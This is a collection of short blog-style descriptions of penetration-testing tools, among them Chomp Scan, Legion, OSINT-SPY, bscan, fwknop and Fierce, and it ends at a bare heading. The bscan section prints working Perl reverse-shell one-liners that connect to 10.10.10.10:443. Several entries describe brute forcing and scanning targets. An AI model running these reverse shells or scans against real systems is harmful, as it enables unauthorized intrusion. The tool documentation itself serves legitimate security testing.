Cat-Nip – Automated Basic Pentest Tool (Designed For Kali Linux)

Cat-Nip Automated Basic Pentest Toolthis tool will make your basic pentesting task like Information Gathering, Auditing, And Reporting so this tool will do every task fully automatic.Usage GuideDownload / Clone Cat-Nip~# git clone https://github.com/baguswiratmaadi/catnipGo Inside Cat-Nip Dir~# cd catnipGive Permission To Cat-Nip~# chmod 777 catnip.shRun Cat-Nip~# ./catnip.shChangelog1.0 First ReleasePentest Tools Auto Executed With Cat-NipWhois LookupDNSmapNmapDmitryTheharvesterLoad Balancing DetectorSSLyzeAutomaterUa TesterGobusterGrabberParseroUniscanAnd More Tool SoonScreenshotthis is preview Cat-NipTools PreviewOutput ResultReport In HTMLDisclaimerDo not scan government and private IT objects without legal permission.Do At Your Own RiskDownload Catnip

Link: http://feedproxy.google.com/~r/PentestTools/~3/8By2_tKKSAQ/cat-nip-automated-basic-pentest-tool.html

Chomp Scan – A Scripted Pipeline Of Tools To Streamline The Bug Bounty/Penetration Test Reconnaissance Phase

A scripted pipeline of tools to simplify the bug bounty/penetration test reconnaissance phase, so you can focus on chomping bugs.ScopeChomp Scan is a Bash script that chains together the fastest and most effective tools (in my opinion/experience) for doing the long and sometimes tedious process of recon. No more looking for word lists and trying to remember when you started a scan and where the output is. Chomp Scan creates a timestamped output directory based on the search domain, e.g. example.com-21:38:15, and puts all tool output there, split into individual sub-directories as appropriate. Custom output directories are also supported via the -o flag.New: Chomp Scan now integrates Notica, which allows you to receive a notification when the script finishes. Simply visit Notica and get a unique URL parameter. Simply pass the parameter to Chomp Scan via the -n flag, keep the Notica page open in a browser tab on your computer or phone, and you will receive a message when Chomp Scan has finished running. No more constantly checking/forgetting to check those long running scans.Chomp Scan runs in multiple modes. The primary one is using command-line arguments to select which scanning phases to use, which wordlists, etc. A guided interactive mode is available, as well as a non-interactive mode, useful if you do not want to deal with setting multiple arguments.A list of interesting words is included, such as dev, test, uat, staging, etc., and domains containing those terms are flagged. This way you can focus on the interesting domains first if you wish. This list can be customized to suit your own needs, or replaced with a different file via the -X flag.A blacklist file is included, to exclude certain domains from the results. However it does not prevent those domains from being resolved, only from being used for port scanning and content discovery. It can be passed via the -b flag.Chomp Scan supports limited canceling/skipping of tools by pressing Ctrl-c. This can sometimes have unintended side effects, so use with care.Note: Chomp Scan is in active development, and new/different tools will be added as I come across them. Pull requests and comments welcome!Scanning PhasesSubdomain Discovery (3 different sized wordlists)dnscansubfindersublist3rmassdns + altdnsScreenshots (optional)aquatonePort Scanning (optional)masscan and/or nmapnmap output styled with nmap-bootstrap-xslInformation Gathering (optional) (4 different sized wordlists)subjackbfacwhatwebwafw00fniktoContent Discovery (optional) (4 different sized wordlists)ffufgobusterdirsearchWordlistsA variety of wordlists are used, both for subdomain bruteforcing and content discovery. Daniel Miessler’s Seclists are used heavily, as well as Jason Haddix’s lists. Different wordlists can be used by passing in a custom wordlist or using one of the built-in named argument lists below.Subdomain Bruteforcing Argument Name Filename Word Count Description short subdomains-top1mil-20000.txt 22k From Seclists long sortedcombined-knock-dnsrecon-fierce-reconng.txt 102k From Seclists huge huge-200k.txt 199k Combination I made of various wordlists, including Seclists Content Discovery Argument Name Filename Word Count Description small big.txt 20k From Seclists medium raft-large-combined.txt 167k Combination of the raft wordlists in Seclists large seclists-combined.txt 215k Larger combination of all the Discovery/DNS lists in Seclists xl haddix_content_discovery_all.txt 373k Jason Haddix’s all content discovery list xxl haddix-seclists-combined.txt 486k Combination of the two previous lists Misc.altdns-words.txt – 240 words – Used for creating domain permutations for masscan to resolve. Borrowed from altdns.interesting.txt – 43 words – A list I created of potentially interesting words appearing in domain names. Provide your own interesting words list with the -X flag.InstallationClone this repo and run the installer.sh script. Make sure to source ~/.profile after running the installer in order to add the Go binary path to your $PATH variable. Then run Chomp Scan.UsageChomp Scan always runs subdomain enumeration, thus a domain is required via the -u flag. The domain should not contain a scheme, e.g. http:// or https://. By default, HTTPS is always used. This can be changed to HTTP by passing the -H flag. A wordlist is optional, and if one is not provided the built-in short list (20k words) is used.Other scan phases are optional. Content discovery can take an optional wordlist, otherwise it defaults to the built-in short (22k words) list.The final results of the scan are stored in two text files in the output directory. All unique domains that are found are stored in all_discovered_domains.txt, and all unique IPs that are discovered are stored in all_discovered_ips.txt.chomp-scan.sh -u example.com -a d short -cC large -p -o path/to/directoryUsage of Chomp Scan: -u domain (required) Domain name to scan. This should not include a scheme, e.g. https:// or http://. -d wordlist (optional) The wordlist to use for subdomain enumeration. Three built-in lists, short, long, and huge can be used, as well as the path to a custom wordlist. The default is short. -c (optional) Enable content discovery phase. The wordlist for this option defaults to short if not provided. -C wordlist (optional) The wordlist to use for content discovery. Five built-in lists, small, medium, large, xl, and xxl can be used, as well as the path to a custom wordlist. The default is small. -s (optional) Enable screenshots using Aquatone. -i (optional) Enable information gathering phase, using subjack, bfac, whatweb, wafw00f, and nikto. -p (optional) Enable portscanning phase, using masscan (run as root) and nmap. -I (optional) Enable interactive mode. This allows you to select certain tool options and inputs interactively. This cannot be run with -D. -D (optional) Enable default non-interactive mode. This mode uses pre-selected defaults and requires no user interaction or options. This cannot be run with -I. Options: Subdomain enumeration wordlist: short. Content discovery wordlist: small. Aquatone screenshots: yes. Portscanning: yes. Information gathering: yes. Domains to scan: all unique discovered. -b wordlist (optional) Set custom domain blacklist file. -X wordlist (optional) Set custom interesting word list. -o directory (optional) Set custom output directory. It must exist and be writable. -a (optional) Use all unique discovered domains for scans, rather than interesting domains. This cannot be used with -A. -A (optional, default) Use only interesting discovered domains for scans, rather than all discovered domains. This cannot be used with -a. -H (optional) Use HTTP for connecting to sites instead of HTTPS. -h (optional) Display this help page.In The FutureChomp Scan is still in active development, as I use it myself for bug hunting, so I intend to continue adding new features and tools as I come across them. New tool suggestions, feedback, and pull requests are all welcomed. Here is a short list of potential additions I’m considering:Adding a config file, for more granular customization of tools and parametersAdding testing/support for Ubuntu/DebianA possible Python re-write (and maybe a Go re-write after that!)The generation of an HTML report, similar to what aquatone providesExamplesDownload Chomp-Scan

Link: http://www.kitploit.com/2019/03/chomp-scan-scripted-pipeline-of-tools.html

Legion – An Easy-To-Use, Super-Extensible And Semi-Automated Network Penetration Testing Tool That Aids In Discovery, Reconnaissance And Exploitation Of Information Systems

Legion, a fork of SECFORCE’s Sparta, is an open source, easy-to-use, super-extensible and semi-automated network penetration testing framework that aids in discovery, reconnaissance and exploitation of information systems. Legion is developed and maintained by GoVanguard. More information about Legion, including the product roadmap, can be found on it’s product page at https://GoVanguard.io/legion.FEATURESAutomatic recon and scanning with NMAP, whataweb, nikto, Vulners, Hydra, SMBenum, dirbuster, sslyzer, webslayer and more (with almost 100 auto-scheduled scripts)Easy to use graphical interface with rich context menus and panels that allow pentesters to quickly find and exploit attack vectors on hostsModular functionality allows users to easily customize Legion and automatically call their own scripts/toolsHighly customizable stage scanning for ninja-like IPS evasionAutomatic detection of CPEs (Common Platform Enumeration) and CVEs (Common Vulnerabilities and Exposures)Realtime autosaving of project results and tasksNOTABLE CHANGES FROM SPARTARefactored from Python 2.7 to Python 3.6 and the elimination of depreciated and unmaintained librariesUpgraded to PyQT5, increased responsiveness, less buggy, more intuitive GUI that includes features like:Task completion estimates1-Click scan lists of ips, hostnames and CIDR subnetsAbility to purge results, rescan hosts and delete hostsGranual NMAP scanning optionsSupport for hostname resolution and scanning of vhosts/sni hostsRevise process queuing and execution routines for increased app reliability and performanceSimplification of installation with dependency resolution and installation routinesRealtime project autosaving so in the event some goes wrong, you will not loose any progress!Docker container deployment optionSupported by a highly active development teamGIF DEMOINSTALLATIONTRADITIONAL METHODAssumes Ubuntu, Kali or Parrot Linux is being used with Python 3.6 installed. Other dependencies should automatically be installed. Within Terminal:git clone https://github.com/GoVanguard/legion.gitcd legionsudo chmod +x startLegion.shsudo ./startLegion.shDOCKER METHODAssumes Docker and Xauthority are installed. Within Terminal:git clone https://github.com/GoVanguard/legion.gitcd legion/dockersudo chmod +x runIt.shsudo ./runIt.shATTRIBUTIONRefactored Python 3.6+ codebase, added feature set and ongoing development of Legion is credited to GoVanguardThe initial Sparta Python 2.7 codebase and application design is credited SECFORCE.Several additional PortActions, PortTerminalActions and SchedulerSettings are credited to batmancrew.The nmap XML output parsing engine was largely based on code by yunshu, modified by ketchup and modified SECFORCE.ms08-067_check script used by smbenum.sh is credited to Bernardo Damele A.G.Legion relies heavily on nmap, hydra, python, PyQt, SQLAlchemy and many other tools and technologies so we would like to thank all of the people involved in the creation of those.Download Legion

Link: http://feedproxy.google.com/~r/PentestTools/~3/jDSvXwEafjY/legion-easy-to-use-super-extensible-and.html

OSINT-SPY – Search using OSINT (Open Source Intelligence)

Performs OSINT scan on email/domain/ip_address/organization using OSINT-SPY. It can be used by Data Miners, Infosec Researchers, Penetration Testers and cyber crime investigator in order to find deep information about their target.OSINT-SPY Documentation (beta)File Name : READMEAuthor : @sk_securityVersion : 0.0.1Website : osint-spy.comOverview of this tool:Perform scan on IP Address / domain / email address / BTC(bitcoin) address / deviceFind out latest bitcoin block informationList out all the ciphers supported by particular website and serverCheck whether a particular website is vulnerable to heartbleed or not ?Dump all the contacts and messages from skype databaseAnalyze malware or malicous file remotelyLicenses informationOSINT-SPY and its documents are covered with GPL-3.0 (General Public License v3.0)Using OSINT-SPY @@@@@@@@@ @@@@@@@@@ | @@ @ 88888|88888 @@@@@@@@@ 8@@@@@@@@ 8 @ 88888888888 | | @ @ @ | | 8 @ 8 @ @@@@@@@@@@@ | | @ @ @ | | 8 @ 8 @ 88888888888 |@@@@@@@@ | @ @ @ | —- |@@@@@@@@ 8@@@@@@@@ 8 @ @@@@@@@@@@@ | | @ @ @ | | 8 @ @@@@@@@@@@@ | | @ @ @ | | 8 @ 888888888 @@@@@@@@| | @ @@ | @@@@@@@@| 8 @ Search using OSINT Website: www.osint-spy.com Usage: osint-spy.py [options] Options: -h, –help show this help message and exit. –btc_block Find latest Bitcoin blockchain info. –btc_date Find Bitcoin blockchain information from given date. –btc_address Find out balance and transaction information of given bitcoin address. –ssl_cipher List out all the ciphers used by given server. –ssl_bleed Check whether server is vulnerable to heart bleed flaw or not. –domain Get bunch of detail of given website or organization. –email Gather information of a given email address. –device Find out devices which are connected to internet. –ip Enumerate information from given IP Addresss. –skype_db Give the location of skype database in order to fetch all the information from that including chats and contacts. –malware Find out whether a given file is infected by malware or not. –carrier Give path of carrier file behind which you want to add text. –setgo_text Enter text to hide behind carrier file. –stego_find Give a stego file and it will try to find hidden text.Required setupPython 2.7Use install_linux.py (for installing all dependencies and libraries on linux)Use install_windows.py (for installing all dependencies and libraries on windows)Contributors1. Sharad Kumar – @sk_security DocumentationSetting up the enviornmentInstalling and using OSINT-SPY is very easy.Installation process is very simple and is of 4 steps.1.Downloading or cloning OSINT-SPY github repository.2.Downloading and installing all dependencies.3.Generating API Keys4.Adding API Keys in config fileLet’s Begin !!Step 1 – Download OSINT-PSY on your system.In order to install OSINT-SPY simply clone the github repository.Below is the command which you can use in order to clone OSINT-SPY repository.git clone https://github.com/SharadKumar97/OSINT-SPY.gitStep 2 – Downloading and Installing dependencies.Once you clone OSINT-SPY, you will find one directory name as OSINT-SPY. Just go that directory and install dependencies. If you are using OSINT-SPY on windows then run install_linux.py file and if you are using linux then run install_linux.pypython install_linux.pyORpython install_windows.pyGenerating API KeysWe need some API Keys before using this tool.Following are the API’s which we are using in this tool for a time being.1.Clearbit API2.Shodan API3.Fullcontact API4.Virus_Total API5.EmailHunter APIClearbit API Register yourself at Clearbitand activate your account. Once you login, you will find one section of API. Go there and copy your secret API Key and paste inside config.py file. Config.py file can be find in modules directory of OSINT-SPY.Shodan API Register yourself at Shodan and activate your account. Once you activated your account then login to Shodan. Once you login, you will find an API key in overview tab. Copy that key and paste inside config.py file.FullContact API Register yourself at Full Contact. You can sign up by using your email or you can Sign Up with Google. Once you login, you will find your API Key on front of your dashboard. Just copy that key and paste it inside config.py file.VirusTotal API Register yourself at VirusTotal. Once you login, you will find My Api Key section in your profile menu. Just go there and copy your public API Key and paste in config.py file.EmailHunter API Register yourself at Email Hunter . Once you login, go to API tab and click on EYE icon to view your API Key. Copy your API Key in config.py file.UsageOSINT-SPY is very handy tool and easy to use.All you have to do is just have to pass values to parameter.In order to start OSINT-SPY just write — python osint-spy.com–btc_block –btc_block parameter gives you the information of latest bitcoin block chain.Usage:python osint-spy.py –btc_block–btc_date –btc_date parameter will give you an information of bitcoin block chain from given date.Usage:python osint-spy.py –btc_date 20170620–btc_address –btc_address will give you an information about particular bitcoin owner.python osint-spy.py –btc_address 1DST3gm6JthxhuoNKFqXrdpzPFfz1WgHpW–ssl_cipher –ssl_cipher will show you all the ciphers supported by given website.python osint-spy.py –ssl_cipher google.com–ssl_bleed –ssl_bleed will find out whether given website is vulnerable to heartbleed or not ? .python osint-spy.py –ssl_bleed google.com–domain –domain will give you in depth-information about particular domain including whois,dns,ciphers,location and so more.python osint-spy.py –domain google.com–email –email will gather information about given email address from various public sources.python osint-spy.py –email david@toorcon.org–device –device will search for a given device from shodan and will list out all the available devices on public IP.python osint-spy.py –device webcam–ip –ip will gather all the information of given IP Address from public sources.python osint-spy.py –ip 127.0.0.1–skype_db –skype_db will find out all the contacts and message history from given skype database.This can be useful for forensics investigator.In Windows,Skype database can be found in AppData\Roaming\Skype\(Your username)\main.db and in Mac OSX , database can be found in /Users/(Your mac user anme)/Library/Support/Skype/(your skyoe username)/main.dbpython osint-spy.py –skype_db main.db–malware –malware will send a given piece of file to virustotal and will give you a result whether given file is malware or not? .python osint-spy.py –malware abc.exe–carrier and –stego_text –carrier and –stego_text are used to hide text behind any image. –carrier will specify the image behind which you want to hide the text. –stego_text will specify the text you want to add.python osint-spy.py –carrier image.jpg –stego_text This_is_secre_text–stego_find –stego_find will find out hidden text behind any image.python osint-spy.py –stego_find hidden.jpgDownload OSINT-SPY

Link: http://feedproxy.google.com/~r/PentestTools/~3/-x63Tn8Ij2w/osint-spy-search-using-osint-open.html

Bscan – An Asynchronous Target Enumeration Tool

Synopsisbscan is a command-line utility to perform active information gathering and service enumeration. At its core, bscan asynchronously spawns processes of well-known scanning utilities, repurposing scan results into highlighted console output and a well-defined directory structure.Installationbscan was written to be run on Kali Linux, but there is nothing inherently preventing it from running on any OS with the appropriate tools installed.Download the latest packaged version from PyPI:pip install bscanOr get the bleeding-edge version from version control:pip install https://github.com/welchbj/bscan/archive/master.tar.gzBasic Usagebscan has a wide variety of configuration options which can be used to tune scans to your needs. Here’s a quick example:$ bscan \> –max-concurrency 3 \> –patterns [Mm]icrosoft \> –status-interval 10 \> –verbose-status \> scanme.nmap.orgWhat’s going on here?–max-concurrency 3 means that no more than 3 concurrent scan subprocesses will be run at a time–patterns [Mm]icrosoft defines a custom regex pattern with which to highlight matches in the generated scan output–status-interval 10 tells bscan to print runtime status updates every 10 seconds–verbose-status means that each of these status updates will print details of all currently-running scan subprocessesscanme.nmap.org is the host upon which we want to enumeratebscan also relies on some additional configuration files. The default files can be found in the bscan/configuation directory and serve the following purposes:patterns.txt specifies the regex patterns to be highlighted in console output when matched with scan outputrequired-programs.txt specifies the installed programs that bscan plans on usingport-scans.toml defines the port-discovering scans to be run on the target(s), as well as the regular expressions used to parse port numbers and service names from scan outputservice-scans.toml defines the scans be run on the target(s) on a per-service basisDetailed OptionsHere’s what you should see when running bscan –help:usage: bscan [OPTIONS] targets _| |__ ___ ___ __ _ _ __| ‘_ \/ __|/ __/ _` | ‘_ \| |_) \__ \ (__ (_| | | | ||_.__/|___/\___\__,_|_| |_|an asynchronous service enumeration toolpositional arguments: targets the targets and/or networks on which to perform enumerationoptional arguments: -h, –help show this help message and exit –brute-pass-list F filename of password list to use for brute-forcing –brute-user-list F filename of user list to use for brute-forcing –cmd-print-width I the maximum integer number of characters allowed when printing the command used to spawn a running subprocess (defaults to 80) –config-dir D the base directory from which to load the configuration files; required configuration files missing from this directory will instead be loaded from the default files shipped with this program –hard force overwrite of existing directories –max-concurrency I maximum integer number of subprocesses permitted to be running concurrently (defaults to 20) –no-program-check disable checking the presence of required system programs –no-file-check disable checking the presence of files such as configured wordlists –no-service-scans disable running scans on discovered services –output-dir D the base directory in which to write output files –patterns [ [ …]] regex patterns to highlight in output text –ping-sweep enable ping sweep filtering of hosts from a network range before running more intensive scans –quick-only whether to only run the quick scan (and not include the thorough scan over all ports) –qs-method S the method for performing the initial TCP port scan; must correspond to a configured port scan –status-interval I integer number of seconds to pause in between printing status updates; a non-positive value disables updates (defaults to 30) –ts-method S the method for performing the thorough TCP port scan; must correspond to a configured port scan –udp whether to run UDP scans –udp-method S the method for performing the UDP port scan; must correspond to a configured port scan –verbose-status whether to print verbose runtime status updates, based on frequency specified by `–status-interval` flag –version program version –web-word-list F the wordlist to use for scansCompanion ToolsThe main bscan program ships with two utility programs (bscan-wordlists and bscan-shells) to make your life a little easier when looking for wordlists and trying to open reverse shells.bscan-wordlists is a program designed for finding wordlist files on Kali Linux. It searches a few default directories and allows for glob filename matching. Here’s a simple example:$ bscan-wordlists –find “*win*"/usr/share/wordlists/wfuzz/vulns/dirTraversal-win.txt/usr/share/wordlists/metasploit/sensitive_files_win.txt/usr/share/seclists/Passwords/common-passwords-win.txtTry bscan-wordlists –help to explore other options.bscan-shells is a program that will generate a variety of reverse shell one-liners with target and port fields populated for you. Here’s a simple example to list all Perl-based shells, configured to connect back to 10.10.10.10 on port 443:$ bscan-shells –port 443 10.10.10.10 | grep -i -A1 perlperl for windowsperl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’perl with /bin/shperl -e ‘use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’perl without /bin/shperl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’Note that bscan-shells pulls these commands from the reverse-shells.toml configuration file. Try bscan-shells –help to explore other options.DevelopmentStart by setting up a new development environment and installing the requirements (using virtualenvwrapper / virtualenvwrapper-win):# setup the environmentmkvirtualenv -p $(which python3) bscan-devworkon bscan-dev# get the depspip install -r dev-requirements.txtLint and type-check the project (these are run on Travis, too):flake8 . && mypy bscanWhen it’s time to package a new release:# build source and wheel distributionspython setup.py bdist_wheel sdist# run post-build checkstwine check dist/*# upload to PyPItwine upload dist/*Download Bscan

Link: http://feedproxy.google.com/~r/PentestTools/~3/nmAEkhGVeYk/bscan-asynchronous-target-enumeration.html

Fwknop – Single Packet Authorization & Port Knocking

fwknop implements an authorization scheme known as Single Packet Authorization (SPA) for strong service concealment. SPA requires only a single packet which is encrypted, non-replayable, and authenticated via an HMAC in order to communicate desired access to a service that is hidden behind a firewall in a default-drop filtering stance. The main application of SPA is to use a firewall to drop all attempts to connect to services such as SSH in order to make the exploitation of vulnerabilities (both 0-day and unpatched code) more difficult. Because there are no open ports, any service that is concealed by SPA naturally cannot be scanned for with Nmap. The fwknop project supports four different firewalls: iptables, firewalld, PF, and ipfw across Linux, OpenBSD, FreeBSD, and Mac OS X. There is also support for custom scripts so that fwknop can be made to support other infrastructure such as ipset or nftables.SPA is essentially next generation Port Knocking (PK), but solves many of the limitations exhibited by PK while retaining its core benefits. PK limitations include a general difficulty in protecting against replay attacks, asymmetric ciphers and HMAC schemes are not usually possible to reliably support, and it is trivially easy to mount a DoS attack against a PK server just by spoofing an additional packet into a PK sequence as it traverses the network (thereby convincing the PK server that the client doesn’t know the proper sequence). All of these shortcomings are solved by SPA. At the same time, SPA hides services behind a default-drop firewall policy, acquires SPA data passively (usually via libpcap or other means), and implements standard cryptographic operations for SPA packet authentication and encryption/decryption.SPA packets generated by fwknop leverage HMAC for authenticated encryption in the encrypt-then-authenticate model. Although the usage of an HMAC is currently optional (enabled via the –use-hmac command line switch), it is highly recommended for three reasons:Without an HMAC, cryptographically strong authentication is not possible with fwknop unless GnuPG is used, but even then an HMAC should still be applied.An HMAC applied after encryption protects against cryptanalytic CBC-mode padding oracle attacks such as the Vaudenay attack and related trickery (like the more recent “Lucky 13" attack against SSL).The code required by the fwknopd daemon to verify an HMAC is much more simplistic than the code required to decrypt an SPA packet, so an SPA packet without a proper HMAC isn’t even sent through the decryption routines.The final reason above is why an HMAC should still be used even when SPA packets are encrypted with GnuPG due to the fact that SPA data is not sent through libgpgme functions unless the HMAC checks out first. GnuPG and libgpgme are relatively complex bodies of code, and therefore limiting the ability of a potential attacker to interact with this code through an HMAC operation helps to maintain a stronger security stance. Generating an HMAC for SPA communications requires a dedicated key in addition to the normal encryption key, and both can be generated with the –key-gen option.fwknop encrypts SPA packets either with the Rijndael block cipher or via GnuPG and associated asymmetric cipher. If the symmetric encryption method is chosen, then as usual the encryption key is shared between the client and server (see the /etc/fwknop/access.conf file for details). The actual encryption key used for Rijndael encryption is generated via the standard PBKDF1 key derivation algorithm, and CBC mode is set. If the GnuPG method is chosen, then the encryption keys are derived from GnuPG key rings.Use CasesPeople who use Single Packet Authorization (SPA) or its security-challenged cousin Port Knocking (PK) usually access SSHD running on the same system where the SPA/PK software is deployed. That is, a firewall running on a host has a default-drop policy against all incoming SSH connections so that SSHD cannot be scanned, but a SPA daemon reconfigures the firewall to temporarily grant access to a passively authenticated SPA client: "Basic SPA usage to access SSHD"fwknop supports the above, but also goes much further and makes robust usage of NAT (for iptables/firewalld firewalls). After all, important firewalls are usually gateways between networks as opposed to just being deployed on standalone hosts. NAT is commonly used on such firewalls (at least for IPv4 communications) to provide Internet access to internal networks that are on RFC 1918 address space, and also to allow external hosts access to services hosted on internal systems.Because fwknop integrates with NAT, SPA can be leveraged to access internal services through the firewall by users on the external Internet. Although this has plenty of applications on modern traditional networks, it also allows fwknop to support cloud computing environments such as Amazon’s AWS: "SPA usage on Amazon AWS cloud environments"User InterfaceThe official cross-platform fwknop client user interface fwknop-gui (download, github) is developed by Jonathan Bennett. Most major client-side SPA modes are supported including NAT requests, HMAC and Rijndael keys (GnuPG is not yet supported), fwknoprc stanza saving, and more. Currently fwknop-gui runs on Linux, Mac OS X, and Windows – here is a screenshot from OS X:  "fwknop-gui on Mac OS X" Similarly, an updated Android client is available as well.TutorialA comprehensive tutorial on fwknop can be found here:http://www.cipherdyne.org/fwknop/docs/fwknop-tutorial.htmlFeaturesThe following is a complete list of features supported by the fwknop project:Implements Single Packet Authorization around iptables and firewalld firewalls on Linux, ipfw firewalls on *BSD and Mac OS X, and PF on OpenBSD.The fwknop client runs on Linux, Mac OS X, *BSD, and Windows under Cygwin. In addition, there is an Android app to generate SPA packets.Supports both Rijndael and GnuPG methods for the encryption/decryption of SPA packets.Supports HMAC authenticated encryption for both Rijndael and GnuPG. The order of operation is encrypt-then-authenticate to avoid various cryptanalytic problems.Replay attacks are detected and thwarted by SHA-256 digest comparison of valid incoming SPA packets. Other digest algorithms are also supported, but SHA-256 is the default.SPA packets are passively sniffed from the wire via libpcap. The fwknopd server can also acquire packet data from a file that is written to by a separate Ethernet sniffer (such as with tcpdump -w ), from the iptables ULOG pcap writer, or directly via a UDP socket in –udp-server mode.For iptables firewalls, ACCEPT rules added by fwknop are added and deleted (after a configurable timeout) from custom iptables chains so that fwknop does not interfere with any existing iptables policy that may already be loaded on the system.Supports inbound NAT connections for authenticated SPA communications (iptables firewalls only for now). This means fwknop can be configured to create DNAT rules so that you can reach a service (such as SSH) running on an internal system on an RFC 1918 IP address from the open Internet. SNAT rules are also supported which essentially turns fwknopd into a SPA-authenticating gateway to access the Internet from an internal network.Multiple users are supported by the fwknop server, and each user can be assigned their own symmetric or asymmetric encryption key via the /etc/fwknop/access.conf file.Automatic resolution of external IP address via https://www.cipherdyne.org/cgi-bin/myip (this is useful when the fwknop client is run from behind a NAT device). Because the external IP address is encrypted within each SPA packet in this mode, Man-in-the-Middle (MITM) attacks where an inline device intercepts an SPA packet and only forwards it from a different IP in an effort to gain access are thwarted.Port randomization is supported for the destination port of SPA packets as well as the port over which the follow-on connection is made via the iptables NAT capabilities. The later applies to forwarded connections to internal services and to access granted to local sockets on the system running fwknopd.Integration with Tor (as described in this DefCon 14 presentation). Note that because Tor uses TCP for transport, sending SPA packets through the Tor network requires that each SPA packet is sent over an established TCP connection, so technically this breaks the "single" aspect of "Single Packet Authorization". However, Tor provides anonymity benefits that can outweigh this consideration in some deployments.Implements a versioned protocol for SPA communications, so it is easy to extend the protocol to offer new SPA message types and maintain backwards compatibility with older fwknop clients at the same time.Supports the execution of shell commands on behalf of valid SPA packets.The fwknop server can be configured to place multiple restrictions on inbound SPA packets beyond those enforced by encryption keys and replay attack detection. Namely, packet age, source IP address, remote user, access to requested ports, and more.Bundled with fwknop is a comprehensive test suite that issues a series of tests designed to verify that both the client and server pieces of fwknop work properly. These tests involve sniffing SPA packets over the local loopback interface, building temporary firewall rules that are checked for the appropriate access based on the testing config, and parsing output from both the fwknop client and fwknopd server for expected markers for each test. Test suite output can easily be anonymized for communication to third parties for analysis.fwknop was the first program to integrate port knocking with passive OS fingerprinting. However, Single Packet Authorization offers many security benefits beyond port knocking, so the port knocking mode of operation is generally deprecated.Building fwknopThis distribution uses GNU autoconf for setting up the build. Please see the INSTALL file for the general basics on using autoconf.There are some "configure" options that are specific to fwknop. They are (extracted from ./configure –help): –disable-client Do not build the fwknop client component. The default is to build the client. –disable-server Do not build the fwknop server component. The default is to build the server. –with-gpgme support for gpg encryption using libgpgme [default=check] –with-gpgme-prefix=PFX prefix where GPGME is installed (optional) –with-gpg=/path/to/gpg Specify path to the gpg executable that gpgme will use [default=check path] –with-firewalld=/path/to/firewalld Specify path to the firewalld executable [default=check path] –with-iptables=/path/to/iptables Specify path to the iptables executable [default=check path] –with-ipfw=/path/to/ipfw Specify path to the ipfw executable [default=check path] –with-pf=/path/to/pfctl Specify path to the pf executable [default=check path] –with-ipf=/path/to/ipf Specify path to the ipf executable [default=check path]Examples:./configure –disable-client –with-firewalld=/bin/firewall-cmd./configure –disable-client –with-iptables=/sbin/iptables –with-firewalld=noDownload Fwknop

Link: http://www.kitploit.com/2019/02/fwknop-single-packet-authorization-port.html

Fierce – Semi-Lightweight Scanner That Helps Locate Non-Contiguous IP Space And Hostnames Against Specified Domains

Fierce is a semi-lightweight scanner that helps locate non-contiguous IP space and hostnames against specified domains.It’s really meant as a pre-cursor to nmap, unicornscan, nessus, nikto, etc, since all of those require that you already know what IP space you are looking for.This does not perform exploitation and does not scan the whole internet indiscriminately. It is meant specifically to locate likely targets both inside and outside a corporate network.Because it uses DNS primarily you will often find mis-configured networks that leak internal address space. That’s especially useful in targeted malware.Options:-connect Attempt to make http connections to any non RFC1918 (public) addresses. This will output the return headers but be warned, this could take a long time against a company with many targets, depending on network/machine lag. I wouldn’t recommend doing this unless it’s a small company or you have a lot of free time on your hands (could take hours-days). Inside the file specified the text “Host:\n" will be replaced by the host specified. Usage:perl fierce.pl -dns example.com -connect headers.txt-delay The number of seconds to wait between lookups.-dns The domain you would like scanned.-dnsfile Use DNS servers provided by a file (one per line) for reverse lookups (brute force).-dnsserver Use a particular DNS server for reverse lookups (probably should be the DNS server of the target). Fierce uses your DNS server for the initial SOA query and then uses the target’s DNS server for all additional queries by default.-file A file you would like to output to be logged to.-fulloutput When combined with -connect this will output everything the webserver sends back, not just the HTTP headers.-help This screen.-nopattern Don’t use a search pattern when looking for nearby hosts. Instead dump everything. This is really noisy but is useful for finding other domains that spammers might be using. It will also give you lots of false positives, especially on large domains.-range Scan an internal IP range (must be combined with -dnsserver). Note, that this does not support a pattern and will simply output anything it finds. Usage:perl fierce.pl -range 111.222.333.0-255 -dnsserver ns1.example.co-search Search list. When fierce attempts to traverse up and down ipspace it may encounter other servers within other domains that may belong to the same company. If you supply a comma delimited list to fierce it will report anything found. This is especially useful if the corporate servers are named different from the public facing website. Usage:perl fierce.pl -dns examplecompany.com -search corpcompany,blahcompany Note that using search could also greatly expand the number of hosts found, as it will continue to traverse once it locates servers that you specified in your search list. The more the better.-suppress Suppress all TTY output (when combined with -file).-tcptimeout Specify a different timeout (default 10 seconds). You may want to increase this if the DNS server you are querying is slow or has a lot of network lag.-threads Specify how many threads to use while scanning (default is single threaded).-traverse Specify a number of IPs above and below whatever IP you have found to look for nearby IPs. Default is 5 above and below. Traverse will not move into other C blocks.-version Output the version number.-wide Scan the entire class C after finding any matching hostnames in that class C. This generates a lot more traffic but can uncover a lot more information.-wordlist Use a seperate wordlist (one word per line). Usage:perl fierce.pl -dns examplecompany.com -wordlist dictionary.txtfierce Usage Exampleroot@kali:~# fierce -dns example.com DNS Servers for example.com: b.iana-servers.net a.iana-servers.netTrying zone transfer first…Testing b.iana-servers.net Request timed out or transfer not allowed.Testing a.iana-servers.net Request timed out or transfer not allowed.Unsuccessful in zone transfer (it was worth a shot)Okay, trying the good old fashioned way… brute forceChecking for wildcard DNS…Nope. Good.Now performing 2280 test(s)…Download Fierce-Domain-Scanner

Link: http://feedproxy.google.com/~r/PentestTools/~3/X8Fc7tY8OFI/fierce-semi-lightweight-scanner-that.html

Scanner-Cli – A Project Security/Vulnerability/Risk Scanning Tool

